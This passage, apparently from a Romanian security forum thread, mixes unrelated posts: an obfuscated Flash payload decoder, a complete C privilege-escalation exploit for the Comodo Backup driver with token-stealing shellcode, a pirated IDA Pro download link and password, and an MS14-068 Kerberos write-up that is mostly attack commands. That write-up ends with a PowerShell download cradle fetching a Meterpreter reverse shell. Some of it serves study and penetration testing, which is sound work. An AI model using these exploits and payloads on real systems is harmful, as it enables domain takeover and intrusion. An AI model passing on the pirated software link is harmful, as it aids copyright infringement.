afhXCceAnyT5+MABIt0woqNvWEMffhX5ETC75og24K2dTKyVBJFYmy5Ph/iEFTN/TU8zUIV9Qdb7FNuJdcwviq6mYHNTnLJrOdosHIAdEWpDdQ="; this.vree = (getDefinitionByName("flash.utils.ByteArray") as Class); this.weruji = "length"; this.fhrw = "position"; this.wxwrtu = "writeString".replace("String", "Byte"); this.erh = "writeMultiString".replace("String", "Byte"); this.jetk = "57getr846bJrFs6gRUdLf"; this.wxyhw = "iso-8859-1"; this.eruuf = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcd_efghijklmnopqrstuvwxyz0123456789+/=".replace("_", ""); } private static function kyte(){ var _local1:* = new jtyk.ejtey.vree(); _local1[jtyk.ejtey.erh](jtyk.ejtey.jetk, jtyk.ejtey.wxyhw); _local1[jtyk.ejtey.fhrw] = 0; return (_local1); } public static function xxfrh(){ var _local1:* = jtyk.wigr(jtyk.ejtey.ybe); var _local2:* = jtyk.kyte(); var _local3:* = new jtyk.ejtey.vree(); var _local4 = 0; var _local5 = 0; var _local6 = 0; var _local7 = 0; var _local8 = 0; var _local9 = 0; var _local10 = 0; _local4 = 0; if ((_local4 < 0x0100)){ _local3[_local4] = _local4; _local4++; //unresolved jump }; _local3[jtyk.ejtey.fhrw] = 0; _local4 = 0; if ((_local4 < 0x0100)){ _local8 = ((((_local2[_local7] & 0xFF) + (_local3[_local4] & 0xFF)) + _local8) & 0xFF); _local10 = _local3[_local4]; _local3[_local4] = _local3[_local8]; _local3[_local8] = _local10; _local7 = ((_local7 + 1) % _local2[jtyk.ejtey.weruji]); _local4++; //unresolved jump }; _local3[jtyk.ejtey.fhrw] = 0; _local4 = 0; if ((_local4 < _local1[jtyk.ejtey.weruji])){ _local5 = ((_local5 + 1) & 0xFF); _local6 = (((_local3[_local5] & 0xFF) + _local6) & 0xFF); _local10 = _local3[_local5]; _local3[_local5] = _local3[_local6]; _local3[_local6] = _local10; _local9 = (((_local3[_local5] & 0xFF) + (_local3[_local6] & 0xFF)) & 0xFF); _local1[_local4] = (_local1[_local4] ^ _local3[_local9]); _local4++; //unresolved jump }; return (_local1); } private static function wigr(_arg1:String){ var _local2:* = new jtyk.ejtey.vree(); var _local3 = new Array(4); var _local4 = new Array(3); var _local5:uint = 0; if ((_local5 < _arg1.length)){ var _local6:uint = 0; if ((((_local6 < 4)) && (((_local5 + _local6) < _arg1.length)))){ _local3[_local6] = jtyk.ejtey.eruuf.indexOf(_arg1.charAt((_local5 + _local6))); while ((((_local3[_local6] < 0)) && ((_local5 < _arg1.length)))) { _local5++; _local3[_local6] = jtyk.ejtey.eruuf.indexOf(_arg1.charAt((_local5 + _local6))); }; _local6++; //unresolved jump }; _local4[0] = ((_local3[0] << 2) + ((_local3[1] & 48) >> 4)); _local4[1] = (((_local3[1] & 15) << 4) + ((_local3[2] & 60) >> 2)); _local4[2] = (((_local3[2] & 3) << 6) + _local3[3]); var _local9:uint = 0; if ((_local9 < _local4[jtyk.ejtey.weruji])){ if ((_local3[(_local9 + 1)] == 64)){ } else { _local2[jtyk.ejtey.wxwrtu](_local4[_local9]); _local9++; //unresolved jump }; }; _local5 = (_local5 + 4); //unresolved jump }; _local2[jtyk.ejtey.fhrw] = 0; return (_local2); [LIST=1] [*] } [/LIST] jtyk.ejtey = new (jtyk)(); } }//package[COLOR=#333333][FONT=segoe ui][B] Sursa: http://pastebin.com/nVKV8Ess

Invata C#.

@Zatarra se ocupa de chatu vietii, mie mi se rupe de el.

[h=1]Comodo Backup 4.4.0.0 - NULL Pointer Dereference EOP[/h] /* Exploit Title - Comodo Backup Null Pointer Dereference Privilege Escalation Date - 23rd January 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - https://www.comodo.com Tested Version - 4.4.0.0 Driver Version - 1.0.0.957 - bdisk.sys Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1 OSVDB - http://www.osvdb.org/show/osvdb/112828 CVE ID - CVE-2014-9633 Vendor fix url - http://forums.comodo.com/news-announcements-feedback-cb/comodo-backup-44123-released-t107293.0.html Fixed version - 4.4.1.23 Fixed Driver Ver - 1.0.0.972 Note ---- Does not cleanly exit, had to use some leave instructions to get the command prompt. If you know of a better way please do let me know. Below in from Windows XP in IofCallDriver function. eax = 12h 804e37fe 8b7108 mov esi,dword ptr [ecx+8] <- control the null page as ecx = 00000000 804e3801 52 push edx 804e3802 51 push ecx 804e3803 ff548638 call dword ptr [esi+eax*4+38h] ds:0023:00000080=00000090 804e3807 5e pop esi 804e3808 c3 ret esi + eax*4 + 38h = 0 + 48 + 38 = 80h if ESI is null */ #include <stdio.h> #include <windows.h> #define BUFSIZE 4096 typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN OUT PULONG RegionSize, IN ULONG AllocationType, IN ULONG Protect); // Windows XP SP3 #define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct #define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct #define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct #define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct // Windows 7 SP1 #define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct #define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct #define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct #define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct BYTE token_steal_xp[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc9, // leave 0xc9, // leave 0xc9, // leave 0xc9, // leave 0xc3 // ret }; BYTE token_steal_w7[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN 0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,W7_TOKEN,0x00,0x00,0x00, // mov [eax+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc9, // leave 0xc9, // leave 0xc9, // leave 0xc9, // leave 0xc3 // ret }; BYTE ESInull[] = "\x00\x00\x00\x00"; BYTE RETaddr[] = "\x90\x00\x00\x00"; int GetWindowsVersion() { int v = 0; DWORD version = 0, minVersion = 0, majVersion = 0; version = GetVersion(); minVersion = (DWORD)(HIBYTE(LOWORD(version))); majVersion = (DWORD)(LOBYTE(LOWORD(version))); if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; return v; } void spawnShell() { STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(?, sizeof(pi)); ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, ?)) { printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); return; } CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } int main(int argc, char *argv[]) { _NtAllocateVirtualMemory NtAllocateVirtualMemory; NTSTATUS allocstatus; LPVOID base_addr = (LPVOID)0x00000001; DWORD written; int rwresult; int size = BUFSIZE; HANDLE hDevice; unsigned char buffer[BUFSIZE]; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf(" COMODO Backup (bdisk.sys) Null Pointer Dereference EoP Exploit \n"); printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); sprintf(devhandle, "\\\\.\\%s", "bdisk"); NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory"); if (!NtAllocateVirtualMemory) { printf("[-] Unable to resolve NtAllocateVirtualMemory\n"); return -1; } printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory); printf("[+] Allocating memory at [0x%p]\n", base_addr); allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (allocstatus) { printf("[-] An error occured while mapping executable memory. Status = 0x%08x\n", allocstatus); printf("Error : %d\n", GetLastError()); return -1; } printf("[+] NtAllocateVirtualMemory successful\n"); memset(buffer, 0x90, BUFSIZE); memcpy(buffer+0x00000007, ESInull, sizeof(ESInull)-1); memcpy(buffer+0x0000007f, RETaddr, sizeof(RETaddr)-1); if (GetWindowsVersion() == 1) { printf("[i] Running Windows XP\n"); memcpy(buffer+0x00000100, token_steal_xp, sizeof(token_steal_xp)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); } else if (GetWindowsVersion() == 2) { printf("[i] Running Windows 7\n"); memcpy(buffer+0x00000100, token_steal_w7, sizeof(token_steal_w7)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7)); } else if (GetWindowsVersion() == 0) { printf("[i] Exploit not supported on this OS\n\n"); return -1; } rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written); if (rwresult == 0) { printf("[-] An error occured while mapping writing memory: %d\n", GetLastError()); return -1; } printf("[+] WriteProcessMemory %d bytes written\n", written); printf("[~] Press any key to Exploit . . .\n"); getch(); hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } CloseHandle(hDevice); printf("[+] Spawning SYSTEM Shell\n"); spawnShell(); return 0; } Sursa: http://www.exploit-db.com/exploits/35905/

How to intercept traffic from Java applications December 19, 2014 Ionut Popescu During a security assessment you may need to monitor the traffic from a Java application and also to modify it. What can you do? What if the application uses SSL/TLS and even SSL pinning? We found a very useful tool which helped us in this type of situations. JavaSnoop JavaSnoop is a tool developed by Aspect Security with the purpose of helping people to intercept Java function calls (e.g. toString) from Java applications. It allows you to attach to a process and intercept any Java function call, view and modify the parameter values, print the stacktrace or save all function calls to a file.JavaSnoop allows browsing all Java classes and all functions used by the target application. What you have to do is to choose the right function from the right class to hook in order to intercept the function call and parameters. For example, you may consider functions that send, receive, hash or encrypt data in order to intercept and modify sensitive data. Sursa: How to intercept traffic from Java applications – Security Café

[h=1]Bruce Schneier and Edward Snowden[/h] Bruce Schneier, Harvard Berkman Center Fellow, talks with Edward Snowden about government surveillance and the effectiveness of privacy tools like encryption to an audience at Harvard's School of Engineering and Applied Sciences. This conversation kicks off the annual symposium on the future of computation in science and engineering hosted by the IACS- Harvard's Institute for Applied Computational Science.

Windows 7 or 8 to Windows 10 using Windows Update By Martin Brinkmann on January 25, 2015 in Windows - Last Update: January 25, 2015 8 The only options you had previously to upgrade from an older copy of Windows to a new one was to run the installer either while the installed operating system was running or by booting from an installation disc or Flash drive to initiate it. Microsoft wants to make things more comfortable and has added an option to upgrade to Windows 10 using Windows Update. Windows Update is the operating system's updating service which is best known for delivering security patches once a month to supported Windows devices. The core benefit of upgrading via Windows Update is convenience. You don't need to download the ISO image of Windows 10, don't need to burn it to DVD or copy it to a USB Flash Drive, and don't need to run it afterwards on your system. Note: Windows 10 is not ready for prime time yet and it is not suggested to upgrade your work system to it. It is ideal if you have a spare system and want to try it out or a full backup that you can restore. The upgrade process The first thing you need to do is downloaded a small program from Microsoft which prepares your Windows 7 or Windows 8 operating system for the upgrade. It is a 10 Megabyte file that runs automatically on your computer after you execute it. It requires a restart of the PC so that the changes it made take effect. The device will boot into the current operating system after restart. Open Windows Update on the PC now. You can tap on the Windows-key, type Windows Update and hit enter to do so. There you need to click on the check for updates button. It may take a while for the check to complete. In the end, the update to Windows 10 should be displayed which you can run with a click on the install button. As you can see on the screenshot above, the update has a size of 2.8 Gigabyte. The download may take a while depending on your Internet connection speed. The update installer runs the same upgrade process as the ISO installer. Important remarks It seems possible to go back to the old operating system after the update. While that is the case, it is highly suggested that you create a backup of your important files and data before you proceed with the update. If you are running a 32-bit version of Windows, you cannot upgrade to 64-bit versions of Windows 10. There is also no option to change the interface language during the upgrade process. You can remove the "update to Windows 10 preparation update" again from Windows. You find it in the installed updates list as "Update for Microsoft Windows (KB2990214)". Closing Words Windows 10 will be a free upgrade in the first year to all (home) customers who run Windows 7 or Windows 8.1 devices and it is likely that Microsoft will make Windows Update one of the delivery options for the update. Now You: What's your Windows 10 upgrade experience? Sursa: http://www.ghacks.net/2015/01/25/how-to-update-windows-7-or-8-to-windows-10-using-windows-update/

Install and when prompted, enter password: itJpyHidszaR Hex-Rays.IDA.Pro.v6.6.Incl.Hex-Rays.Decompiler-iND https://mega.co.nz/#!0dJT1LrK!4KzjVznWIVTCEY_7xpSRY8X_UdQynndqyalGoMis7vc Download links for ida6620150114204514.rar - Mirrorcreator - Upload files to multiple hosts Via TrojanForge: https://trojanforge.co/showthread.php/3172-Hex-Rays-IDA-Pro-6-6-Incl-Hex-Rays-Decompiler

Cred ca se poate in versiunea Premium/Pro care costa probabil vreo 50 de $.

Digging into MS14-068, Exploitation and Defence The security world has been abuzz lately after Microsoft released a critical security patch to fix a flaw in a core service provided by domain controllers. The vulnerability, known by the identifier MS14-068 (CVE-2014-6324), allows any authenticated domain user to escalate their privileges to domain administrator. As a result, an authenticated attacker is able to completely compromise the domain. Most concerning of all it was revealed that this issue was being exploited in the wild! This post will discuss the technical details of this vulnerability and provide a brief guide for exploiting this issue in a couple of common scenarios that may be encountered during a penetration test. Kerberos in a Windows Domain Kerberos enables users to authenticate to services via a trusted third party. This allows authentication to be centralised so that all the remote services in a network do not require access to user secrets for authentication purposes. The following steps provide a brief overview of the initial stages of the Kerberos protocol in a Windows domain: 1. AS-REQ The user authenticates with the trusted third party known as the Key Distribution Centre (KDC) — the domain controller in a Windows domain — by sending a message containing their identity and a timestamp encrypted with their password as proof of identity. 2. AS-REP If the user authenticated successfully then the KDC constructs a ticket granting ticket (TGT) that will be used by the client to request tickets for other services. The TGT is a service ticket for the Ticket Granting Service (TGS) which is also running on the KDC. Simplified example of a TGT A Kerberos ticket, such as a TGT, contains identifying information about a user and their roles. In a Windows domain this structure is known as the Privilege Attribute Certificate (PAC) which stores information that includes the account name, ID and group membership information. In order to protect the integrity of the PAC it is signed by the KDC using secret keys known only to the KDC and the target service. One signature uses the target service account’s key and the other uses a key known only by the KDC. This allows the KDC or the target service to verify that the PAC has not been tampered with after creation. Furthermore, the entire ticket is encrypted using the target service’s secret key. In the case of the TGT the account of the target service is the krbtgt account. Therefore, both signatures on the PAC are keyed with the krbtgt account’s key and the ticket is encrypted with that same key. The ticket also contains a session key for use in future communication with the TGS. The TGT is returned by the KDC in a message that also contains the TGS session key encrypted with the secret key of the user. 3. TGS-REQ The request for a service ticket from the TGS contains three major components: The name of the service that will be accessed The TGT which is encrypted with the krbtgt key An authenticator: the user ID and a timestamp encrypted with the TGS session key 4. TGS-REP The TGS can decrypt the presented TGT in order to recover the session key. This key is then used to decrypt the authenticator. The TGS is now able to verify that the ID contained in the authenticator matches the TGT, that the TGT has not expired, and the PAC has a valid signature. If the the information presented is acceptable then the information from the PAC in the TGT is copied into a new service ticket. The PAC in the new ticket is signed once using the key of the target service and then again with the krbtgt key. The ticket itself is encrypted using the key of the target service. The client can use the ticket returned by the TGS as a proof of identity with which to access the target service. MS14-068 Analysis On 18th November a critical security patch was released by Microsoft to fix an issue in the way the KDC validates the signature of the PAC. This vulnerability would allow a PAC to be forged that would be accepted by the KDC as legitimate. Since the PAC contains the groups that the user is a member of it would be possible to abuse the flaw to create a fake PAC claiming they are a member of the domain administrators group. The underlying issue was relatively simple. Instead of requiring one of the three signature types prescribed by the MS-PAC specification, the KDC service would accept any checksum type that is implemented in the low-level cryptographic library. The supported checksums included unkeyed algorithms such as plain MD5 or even CRC32. Therefore, it is possible to forge a PAC without knowledge of any secret keys by ‘signing’ it using CRC32. This issue was easy to verify by making a small modification to Mimikatz so that the PAC in a golden ticket is ‘signed’ using CRC32: diff --git a/mimikatz/modules/kerberos/kuhl_m_kerberos.c b/mimikatz/modules/kerberos/kuhl_m_kerberos.c index a262149..2478213 100644 --- a/mimikatz/modules/kerberos/kuhl_m_kerberos.c +++ b/mimikatz/modules/kerberos/kuhl_m_kerberos.c @@ -555,7 +555,9 @@ PDIRTY_ASN1_SEQUENCE_EASY kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR default: SignatureType = KERB_CHECKSUM_HMAC_MD5; } + SignatureType = KERB_CHECKSUM_CRC32; + if(kuhl_m_pac_validationInfo_to_PAC(&validationInfo, SignatureType, &pacType, &pacTypeSize)) { kprintf(L" * PAC generated\n"); The following screenshot shows the ‘signatures’ on the PAC in the TGT generated by the patched version of Mimikatz: CRC32 PAC Signature Although this test of MS14-068 is successful, Mimikatz still requires the krbtgt key in order to encrypt the TGT. We managed to create a forged PAC, but it doesn’t seem possible to put it into a TGT without knowledge of the target service’s secret key (i.e. the krbtgt account’s hash). If this key is available then the standard golden or silver ticket attacks apply, so MS14-068 is unnecessary. The observation made by Sylvain Monné, and neatly exploited in his proof of concept (PyKEK), is that the PAC does not necessarily need to be included in the encrypted ticket. Instead, a forged PAC can be placed in the enc-authorization-data segment of the TGS-REQ message. Although this field is encrypted, it is protected with a key known to the user. Either the TGT session key or a sub-session key (specified in the authenticator) can be used. The second trick is to request a valid TGT that does not contain a PAC by setting the PA-PAC-REQUEST parameter in the AS-REQ to false. This is done to ensure there are no conflicts between the legitimate PAC in the TGT and the forged PAC included elsewhere. So, in order to perform the exploit, only the ID and password of a standard domain user are required. These details are necessary to request a PAC-less TGT, recover the session key that is returned, and encrypt the authenticator in the TGS-REQ. The following image shows a simplified example of a TGS-REQ message to exploit MS14-068. A valid TGT is included, but it does not contain a PAC. Instead, a malicious PAC created by the user has been included in the enc-authorization-data field. This PAC claims that the user is a member of a number of privileged groups, including the domain administrators, and has been ‘signed’ using plain MD5. TGS-REQ containing a forged PAC to exploit MS14-068 The steps taken by PyKEK to exploit MS14-068 are as follows: Request a TGT without a PAC by sending an AS-REQ with PA-PAC-REQUEST set to false. Forge a PAC claiming membership of domain administrators. ‘Sign’ it using plain MD5. Create a TGS-REQ message with krbtgt as the target. The TGT from the first step is used along with the fake PAC encrypted with a sub-session key. Send this to a vulnerable domain controller. The KDC service will accept the forged PAC and return a new TGT which contains a PAC. This TGT can be injected into memory using Mimikatz to be used during the standard Kerberos authentication flow. Interestingly this entire issue is a repeat of CVE-2011-0043 (MS11-013), albeit in a different area of code. At that time the issue was identified as a “Kerberos Unkeyed Checksum Vulnerability” and due to “the Microsoft Kerberos implementation [supporting] a weak hashing mechanism, which can allow for certain aspects of a Kerberos service ticket to be forged”. Furthermore, this issue was reported by the MIT Kerberos team after the same vulnerability was fixed in their implementation in 2010 (CVE-2010-1324). Given that the issue was found to be being actively exploited prior to the patch being released it is possible that MS14-068 has been used by advanced attackers for a few years now. Practical Exploitation As well as the above mentioned Python Kerberos Exploitation Kit (PyKEK), there is a second toolkit which contains a function exploit: Golden PAC module in Impacket. At the time of writing, these attacks work against domain controllers running Windows 2008 (R2), and earlier, but not against Windows 2012. The only other requirement is a valid domain account username and password. Detecting Vulnerable Domain Controllers The only sure method for detecting a vulnerable system is to look at its patch level (or by attempting to exploit it). However, the Responder tool from SpiderLabs includes a script that will perform basic vulnerability detection by checking the uptime of the server to see if it has been rebooted since the patch was released. $ python FindSMB2UpTime.py 172.16.80.10 DC is up since: 2014-11-08 10:22:08 This DC is vulnerable to MS14-068 This check can yield false negatives as a domain controller may have been rebooted without the patch having been applied. For example, the following check shows an un-patched system that has been restarted: $ python FindSMB2UPTime.py 172.16.80.10 DC is up since: 2014-12-08 20:53:19 Internal Penetration Testing The first demonstration is against the target when you have normal network level access. This means you have your DNS server set to the domain’s DNS server (probably your target DC). It is important when working with Kerberos that your system clock is synced with the target host. Kerberos generally allows a 5 minute skew by default, but we can use tools to find the target’s time from an unauthenticated perspective. For example, the net command: $ net time -S 172.16.80.10 Wed Dec 10 11:05:09 2014 Or with the nmap smb-os-discovery script: | smb-os-discovery: | OS: Windows Server ® 2008 Standard 6002 Service Pack 2 (Windows Server ® 2008 Standard 6.0) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp2 | Computer name: msfdc01 | NetBIOS computer name: MSFDC01 | Domain name: metasploitable.local | Forest name: metasploitable.local | FQDN: msfdc01.metasploitable.local |_ System time: 2014-12-10T11:02:33+00:00 After setting your local system time, we need to get the user’s SID. We can query this remotely with the net tool: $ net rpc -W METASPLOITABLE.LOCAL -U user01 -S 172.16.80.10 shell Enter user01's password: Talking to domain METASPLOITABLE (S-1-5-21-2928836948-3642677517-2073454066) net rpc> user net rpc user> show net rpc user> show user01 user rid: 1105, group rid: 513 We can combine the Domain SID with the user RID to get the target user’s SID: S-1-5-21-2928836948-3642677517-2073454066-1105. The next step is to generate our Kerberos ticket with PyKEK. We need to supply the following arguments: -u USERNAME@FQDN.DOMAIN.NAME (our username) -d TARGET.FDQN.DOMAIN.NAME (the domain controller) -p PASSWORD (our password) -s SID (our SID) The following command has generated a forged TGT for user01 and stored it in the TGT_user01@metasploitable.local.ccache file: $ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066 -1105 [+] Building AS-REQ for msfdc01.metasploitable.local... Done! [+] Sending AS-REQ to msfdc01.metasploitable.local... Done! [+] Receiving AS-REP from msfdc01.metasploitable.local... Done! [+] Parsing AS-REP from msfdc01.metasploitable.local... Done! [+] Building TGS-REQ for msfdc01.metasploitable.local... Done! [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done! [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done! [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done! [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done! To use this ticket, which is in the Credential Cache (ccache) format, we need to move it to the /tmp directory where the Kerberos tools look for tickets: $ mv TGT_user01@metasploitable.local.ccache /tmp/krb5cc_0 We can then authenticate to the domain controller: $ smbclient -W METASPLOITABLE.LOCAL -k //msfdc01/c$ OS=[Windows Server ® 2008 Standard 6002 Service Pack 2] Server=[Windows Server ® 2008 Standard 6.0] smb: \> and even use winexe to execute commands: $ winexe -k METASPLOITABLE.LOCAL //msfdc01 whoami metasploitable.local\user01 In order to get a reverse shell, we can set up a Metasploit delivery mechanism such as Powershell Web Delivery: 20141210-11:29 - 192.168.153.133 exploit(web_delivery) > set TARGET 2 TARGET => 2 20141210-11:30 - 192.168.153.133 exploit(web_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp 20141210-11:30 - 192.168.153.133 exploit(web_delivery) > set LHOST 172.16.3.76 LHOST => 172.16.3.76 20141210-11:30 - 192.168.153.133 exploit(web_delivery) > set LPORT 8686 LPORT => 8686 20141210-11:30 - 192.168.153.133 exploit(web_delivery) > run [*] Exploit running as background job. [*] [2014.12.10-11:30:43] Started reverse handler on 172.16.3.76:8686 [*] [2014.12.10-11:30:43] Using URL: http://0.0.0.0:8080/moKqrqIYh0 [*] [2014.12.10-11:30:43] Local IP: http://192.168.153.133:8080/moKqrqIYh0 [*] [2014.12.10-11:30:43] Server started. [*] [2014.12.10-11:30:43] Run the following command on the target machine: powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.3.76:8080/moKqrqIYh0')) We then pass the powershell command line to winexe to run as a service: $ winexe -k METASPLOITABLE.LOCAL //msfdc01 "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.3.76 :8080/moKqrqIYh0'))" The result is a reverse shell with administrative privileges on the domain controller. At this point we can create a permanent back-door on the domain to maintain access even if the vulnerability becomes patched in the future. [*] [2014.12.10-11:36:43] 172.16.80.10 web_delivery - Delivering Payload [*] [2014.12.10-11:36:43] Sending stage (770048 bytes) to 172.16.80.10 [*] Starting interaction with 1... meterpreter > getuid Server username: METASPLOITABLE.LOCAL\user01 meterpreter > sysinfo Computer : MSFDC01 OS : Windows 2008 (Build 6002, Service Pack 2). Architecture : x86 System Language : en_GB Meterpreter : x86/win32 meterpreter > getsystem ...got system (via technique 1). Alternatively with Impacket The Golden PAC module included in Impacket makes post exploitation easier by performing it automatically for you. Once a TGT containing a forged PAC has been created it is used to create an SMB connection to the domain controller and the PsExec technique is used to gain command execution: $ python goldenPac.py metasploitable.local/user01@msfdc01 Impacket v0.9.13-dev - Copyright 2002-2014 Core Security Technologies Password: [*] Requesting shares on msfdc01..... [*] Found writable share ADMIN$ [*] Uploading file zYAhIGAf.exe [*] Opening SVCManager on msfdc01..... [*] Creating service WzhF on msfdc01..... [*] Starting service WzhF..... [!] Press help for extra shell commands Microsoft Windows [Version 6.0.6002] Copyright © 2006 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32>echo %COMPUTERNAME% MSFDC01 Exploiting Remotely The second scenario is exploiting a target user who we have compromised remotely, such as via a phishing attack. We assume that we have a shell on the user’s machine, and have recovered their password (e.g. by escalating to SYSTEM and using Mimikatz to dump it). [*] Meterpreter session 3 opened (172.16.3.76:8686 -> 172.16.80.100:49747) at 2014-12-10 11:55:10 +0000 sessions -i 3 [*] Starting interaction with 3... meterpreter > getuid Server username: METASPLOITABLE\user01 meterpreter > sysinfo Computer : MSFTS01 OS : Windows 8.1 (Build 9600). Architecture : x64 (Current Process is WOW64) System Language : en_GB Meterpreter : x86/win32 We need to be able to talk to the domain controller in order to use the exploit scripts. So, we add a port forward to meterpreter to pivot port 88 (kerberos) over our implant: meterpreter > portfwd add -l 88 -p 88 -r 172.16.80.10 [*] Local TCP relay created: 0.0.0.0:88 <-> 172.16.80.10:88 The FQDN for the target system should also point to localhost so that traffic is forwarded via meterpreter. This can be done with a simple addition to /etc/hosts: $ echo 127.0.0.1 msfdc01 >> /etc/hosts $ echo 127.0.0.1 msfdc01.metasploitable.local >> /etc/hosts The user’s SID can be discovered via the command line: meterpreter > shell Process 2808 created. Channel 5 created. Microsoft Windows [Version 6.3.9600] © 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32\WindowsPowerShell\v1.0>whoami /user whoami /user USER INFORMATION ---------------- User Name SID ===================== ============================================== metasploitable\user01 S-1-5-21-2928836948-3642677517-2073454066-1105 We know have all the information required to use PyKEK to generate our privileged TGT: $ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066 -1105 [+] Building AS-REQ for msfdc01.metasploitable.local... Done! [+] Sending AS-REQ to msfdc01.metasploitable.local... Done! [+] Receiving AS-REP from msfdc01.metasploitable.local... Done! [+] Parsing AS-REP from msfdc01.metasploitable.local... Done! [+] Building TGS-REQ for msfdc01.metasploitable.local... Done! [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done! [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done! [+] Parsing TGS-REP from 